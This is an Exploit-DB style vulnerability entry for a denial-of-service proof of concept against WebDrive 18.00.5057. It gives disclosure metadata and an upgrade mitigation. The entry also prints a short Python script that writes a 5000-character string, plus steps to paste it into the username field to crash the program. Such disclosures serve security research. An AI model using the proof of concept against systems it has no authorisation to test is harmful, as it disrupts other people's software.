WebDrive 18.00.5057 - Denial of Service (PoC)

vendor:

WebDrive

by:

Victor Mondragón

7.8

CVSS

HIGH

Denial of Service

400

CWE

Product Name: WebDrive

Affected Version From: 18.00.5057

Affected Version To: 18.00.5057

Patch Exists: YES

Related CWE: N/A

CPE: a:webdrive:webdrive

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10 Single Language x64

2018

WebDrive 18.00.5057 – Denial of Service (PoC)

A denial of service vulnerability exists in WebDrive 18.00.5057 when a maliciously crafted string is copied to the clipboard and pasted into the username field, resulting in a crash of the application.

Mitigation:

Upgrade to the latest version of WebDrive.

Source

Exploit-DB raw data:

#Exploit Title: WebDrive 18.00.5057 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2018-10-31
#Vendor Homepage: https://webdrive.com/
#Software Link: https://webdrive.com/download/
#Tested Version: 18.00.5057
#Tested on: Windows 10 Single Language x64

#Steps to produce the crash:
#1.- Run python code: WebDrive_18.00.5057.py
#2.- Open string.txt and copy content to clipboard
#2.- Open WebDrive
#3.- Select "New"
#4.- Select "Secure WebDAV" and click on "Siguiente"
#6.- Select "Url / Address" and Put "1.1.1.1" 
#7.- Select "Username" and Paste ClipBoard
#8.- Select "Password" and Put "1234"
#9.- Click on "Test Connection"
#10.- Crashed

cod = "\x41" * 5000

f = open('string.txt', 'w')
f.write(cod)
f.close()